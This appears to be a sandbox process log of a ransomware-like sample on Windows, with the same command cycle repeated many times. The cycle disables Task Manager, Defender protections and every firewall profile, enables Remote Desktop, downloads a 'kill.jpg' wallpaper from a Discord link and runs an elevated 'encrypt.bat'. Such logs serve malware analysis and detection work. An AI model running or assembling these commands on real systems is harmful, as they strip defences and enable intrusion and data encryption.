C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

